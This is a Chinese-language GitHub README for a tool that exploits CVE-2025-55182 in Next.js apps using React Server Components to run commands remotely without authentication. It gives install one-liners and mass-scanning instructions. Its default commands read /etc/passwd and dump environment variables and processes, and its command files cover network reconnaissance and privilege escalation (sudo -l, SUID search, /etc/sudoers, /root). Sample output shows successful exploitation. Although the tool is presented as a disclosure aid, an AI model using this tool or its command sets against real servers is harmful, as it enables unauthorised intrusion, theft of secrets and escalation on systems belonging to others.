rix4uni/CVE-2025-55182

GitHub: rix4uni/CVE-2025-55182

针对利用 React Server Components 的 Next.js 应用漏洞检测工具,支持远程代码执行验证及自动化报告生成。

Stars: 3 | Forks: 1

## CVE-2025-55182 一个命令行工具,用于在使用 React Server Components 的 Next.js 应用程序中检测 CVE-2025-55182 和 CVE-2025-66478。 ## 🚀 安装说明 ``` wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182 wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator ``` ## 🛠️ 使用方法 ### CVE-2025-55182 扫描器 #### 基本语法 ``` CVE-2025-55182 -d https://example.com ``` #### 选项 | 选项 | 描述 | 默认值 | |--------|-------------|---------| | `-d, --domain` | 目标 URL(如果未指定协议,则自动添加 https://) | `http://localhost:3000` | | `-c, --command` | 要执行的单个命令 | - | | `-m, --multiple` | 多个命令,用分号分隔 | - | | `-f, --file` | 包含命令的文件(每行一个) | - | | `-h, --help` | 显示帮助信息 | - | *注意:如果未提供命令选项,则执行默认命令。* #### 默认命令 该工具默认执行以下命令: 1. `cat /etc/os-release` - 操作系统信息 2. `whoami` - 当前用户 3. `pwd` - 当前工作目录 4. `id` - 用户 ID 和组 5. `uname -a` - 系统信息 6. `hostname -I` - 网络接口 7. `ls -la` - 目录列表 8. `cat /etc/passwd` - 用户账户 9. `env` - 环境变量 10. `ps aux` - 运行中的进程 ### 报告生成器 `reportgenerator` 工具根据扫描结果自动生成专业的漏洞披露报告。 #### 功能特性 - 多个目标的**并行扫描** - **自动编号**,保留现有报告(不会覆盖) - 带有安全漏洞披露部分的**专业 markdown 报告** - **自定义研究员姓名**和输入文件 #### 基本用法 ``` # 创建包含目标域的文件 echo -e "https://target1.com\nhttps://target2.com" > subs.txt # 运行 report generator reportgenerator ``` #### 选项 | 标志 | 描述 | 默认值 | |------|-------------|---------| | `--file` | 包含目标域的输入文件 | `subs.txt` | | `--user` | 披露部分的研究员姓名 | `Bhagirath Saxena` | #### 示例 ``` # 使用默认设置 (subs.txt, Bhagirath Saxena) reportgenerator # 使用自定义目标文件 reportgenerator --file targets.txt # 使用自定义研究者名称 reportgenerator --user "John Doe" # 同时使用自定义选项 reportgenerator --file my-targets.txt --user "Jane Smith" ``` #### 输出结构 报告在两个目录中生成: - `textfile/` - 原始扫描输出(编号为:`1.txt`、`2.txt` 等) - `mdfile/` - 专业 markdown 报告(编号为:`1.md`、`2.md` 等) **注意:**自动编号功能确保现有报告永远不会被覆盖。新扫描从现有的最大编号继续。 #### 报告格式 每份生成的报告包括: 1. **安全漏洞披露** - 专业介绍函 2. **目标** - 被测试的域名 3. **执行的命令** - 测试期间运行的命令列表 4. **漏洞摘要** - CVE 详细信息和影响评估 5. **利用细节** - 带有执行状态的命令输出 6. **执行摘要** - 显示每个命令成功/失败的表格 7. **影响分析** - 严重程度评估和观察结果 8. **建议** - 针对安全团队的补救步骤 9. **参考** - CVE 详细信息和安全公告的链接 ## 🎨 输出示例 ### 成功利用 ``` ▼ 🎯 TARGET: https://vulnerable-app.com ▼ 📋 COMMANDS TO RUN: 10 • cat /etc/os-release • whoami • pwd • id • uname -a • hostname -I • ls -la • cat /etc/passwd • env • ps aux [1/10] Executing: cat /etc/os-release ▼ 💻 OS INFORMATION ║ NAME="Ubuntu" ║ VERSION="22.04.3 LTS (Jammy Jellyfish)" ║ ID=ubuntu ║ ID_LIKE=debian ║ PRETTY_NAME="Ubuntu 22.04.3 LTS" ║ ... [2/10] Executing: whoami ▼ 👤 CURRENT USER ║ www-data ... [3/10] Executing: pwd ▼ 📂 CURRENT DIRECTORY ║ /var/www/html ... ``` ### 部分成功 ``` [6/10] Executing: hostname -I ╔════════════════════════════════════════════════════════════╗ ║ Command failed: hostname -I ║ This command might not be available or the server rejected it ╚════════════════════════════════════════════════════════════╝ [!] Trying alternative network command... ▼ 🌐 NETWORK INTERFACES (alternative) ║ 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 ║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 ║ inet 127.0.0.1/8 scope host lo ║ valid_lft forever preferred_lft forever ... ``` ## 🔧 技术细节 ### 漏洞 - **CVE**: CVE-2025-55182 - **类型**: 原型污染 → RCE - **受影响**: 具有特定配置的 Next.js 应用程序 - **向量**: 带有精心构造的 multipart/form-data 的 HTTP POST 请求 - **影响**: 以应用程序用户身份进行未经身份验证的远程代码执行 ## 📚 参考 - [CVE-2025-55182 详情](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) - [Next.js 安全公告](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp) ### `commands/` 目录示例: 为不同场景创建示例命令文件: ``` # commands/basic-recon.txt whoami id uname -a cat /etc/os-release hostname ``` ``` # commands/network-recon.txt ifconfig netstat -tulpn iptables -L cat /etc/hosts cat /etc/resolv.conf ``` ``` # commands/privilege-escalation.txt sudo -l find / -perm -4000 2>/dev/null cat /etc/sudoers ls -la /root/ ```
标签:CISA项目, Cutter, CVE-2025-55182, CVE-2025-66478, Go语言工具, RCE, React Server Components, URL发现, Web安全, 前端安全, 安全检测, 应用安全, 无服务器架构, 漏洞报告生成, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护